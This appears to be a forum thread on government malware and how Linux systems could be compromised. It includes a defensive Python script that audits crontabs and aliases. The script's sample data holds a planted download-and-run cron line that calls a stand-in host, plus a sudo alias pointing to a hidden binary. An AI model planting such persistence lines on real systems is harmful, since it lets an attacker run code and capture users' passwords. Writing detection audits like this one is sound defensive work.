"A surprising number of governments are now deploying their own custom malware and the end result could be chaos for the rest of us, F-Secure's malware chief Mikko Hypponen told the TrustyCon ( https://www.trustycon.org/ ) conference in San Francisco on Thursday.
'Governments writing viruses: today we sort of take that for granted but 10 years ago that would have been science fiction,' he told the public conference. 'If someone had come to me ten years ago and told me that by 2014 it will be commonplace for democratic Western governments to write viruses and actively deploy them against other governments, even friendly governments, I would have thought it was a movie plot. But that's exactly where we are today.'
http://www.scmagazine.com/trustycon-malware-expert-mikko-hypponen-kicks-off-conference-on-trust/article/336089/"
there may be lots of different distributions and configurations, but the kernel is a common weak point (single point of failure). and torvalds is only one human living in the united states... he is not immune from manipulation by the government (i hear waterboarding can be convincing)
True. But unless the kernel is vulnerable to a remote exploit, then almost certainly the delivery mechanism that would work for you wouldn't work for me.
Doctor: "Do you hear voices?"
Me: "Only when my bluetooth is charged."
probably, but i doubt most linux users would review kernel source changes before updating, so if torvalds opted to insert some kind of remote exploit into the kernel (thanks to some friendly "enhanced interrogation" techniques) most would have no idea. a lot would, particularly the core kernel devs, but no doubt they would be targeted too in that scenario.
The malware is in the hardware microcode. No amount of OS safeguarding will prevent a government organization taking over the hypervisor you never knew was running on your Intel CPU.
I'm interested to know more, if you have any reference material. I checked the links in TFS, but didn't find anything. I'm about to buy a new laptop, and full virtualization support in the CPU is one of my requirements. Unfortunately, there isn't much available with an AMD chip these days, not even in the custom laptops I've looked at.
there may be lots of different distributions and configurations, but the kernel is a common weak point (single point of failure).
Not only that, but the core userland is pretty much the same stuff across Linux distros, with minimal customization.
It would be an incredibly lucky coincidence if those slight distro-specific tweaks would somehow end up neutralizing the exact piece of malware to reach your machine.
The kernel isn't the single point of failure that you think. Just because I might run Debian doesn't mean that I am necessarily running a kernel packaged and released by Debian. We can, and some of us do, "roll our own" kernels. An exploit that exists on one Debian box may not exist on another Debian box. And, of course, there are differences between distros. The paranoid who compiles all of his own software from source may share some vulnerabilities with the larger community, or he may even introduce some unique vulnerabilities, but you can't count on much or anything.
And you don't need to infect the kernel at all. All you need are "zero days" on common browsers/clients(IM etc) or common plugins (many Governments can MITM you if you're in their territory or they really really want to). Then the malware gets in and sets itself up to keep running - at, crontab, sneaky aliases, etc.
Very few Linux users run their browsers using other accounts or sandbox their browsers (and do check if your sandbox is tight enough for such a scenario - the last I checked years ago Ubuntu's default apparmor browser sandbox was rather loose - but I've given up on Ubuntu for desktop stuff any more so I'm not bothered).
So even if kernel or privilege escalation exploits would be nice, there's no need in most cases. The user's stuff - email, keys, IM, browser cache (for frame jobs and other stuff), etc - would all be accessible already.
There may be lots of different distros and configurations, but in my experience writing cross platform stuff for linux and unix platforms (BSD, Solaris, AIX etc) a perl script can cope with most of that (one issue is SSL support across all those distros, but if you don't care about encrypting all your channels with SSL that's not a big problem - and even then there are usually workarounds with cli http clients).
TIMTOWTDI is great for writing malware too ;).
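The user-level persistence spots this post names (crontab entries and sneaky shell aliases) are also where a defender can look first. The following is an added example, not the poster's code: a small audit script run over constructed sample crontab and .bashrc contents (the paths, host and alias target are made up for the demonstration).

```python
import re

# Constructed sample data (not captured from any real system): a user crontab and
# a .bashrc fragment, each mixing benign entries with planted persistence.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.x/update.sh >/dev/null 2>&1
@reboot curl -s http://example.invalid/p | sh
"""
SAMPLE_BASHRC = """\
alias ll='ls -alF'
alias grep='grep --color=auto'
alias sudo='/home/user/.cache/.s/sudo'
"""

# Commands run from temp or hidden directories, or fetched and piped to a shell,
# are classic signs of user-level persistence that never touched the kernel.
SUSPICIOUS_PATH = re.compile(r'(^|\s)(/tmp/|/dev/shm/|/var/tmp/|\S*/\.[^/\s]+/)')
PIPE_TO_SHELL = re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b')
# Commands an alias is typically used to wrap so a fake binary sees the typed secret.
SENSITIVE_CMDS = {'sudo', 'ssh', 'su', 'gpg', 'passwd'}
ALIAS_RE = re.compile(r"""^\s*alias\s+([\w.-]+)=(['"]?)(.*)\2\s*$""")

def check_crontab(text):
    # Returns (source, reason, line) tuples for suspicious crontab entries.
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        # Drop the schedule: one field for @reboot-style keywords, else five.
        cmd = line.split(None, 1 if line.startswith('@') else 5)[-1]
        if SUSPICIOUS_PATH.search(cmd):
            findings.append(('cron', 'runs from temp or hidden directory', line))
        if PIPE_TO_SHELL.search(cmd):
            findings.append(('cron', 'downloads and pipes to shell', line))
    return findings

def check_aliases(text):
    # Returns findings for aliases that redirect sensitive commands elsewhere.
    findings = []
    for line in text.splitlines():
        m = ALIAS_RE.match(line)
        if not m:
            continue
        name, body = m.group(1), m.group(3)
        target = body.split()[0] if body.split() else ''
        if name in SENSITIVE_CMDS and target != name:
            findings.append(('alias', f'{name} redirected to {target}', line))
        elif SUSPICIOUS_PATH.search(body):
            findings.append(('alias', 'runs from temp or hidden directory', line))
    return findings
```

On a real box you would feed it `crontab -l` output and each user's rc files; `at` jobs need a separate pass over `atq`/`at -c` output.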
The kernel isn't as interesting as it used to be. Getting the BIOS to run an exploit inside SMM or the BMC would be more interesting. Some BMCs have a JTAG connection to the system. This is especially dangerous since the BMC shares the main system's network port.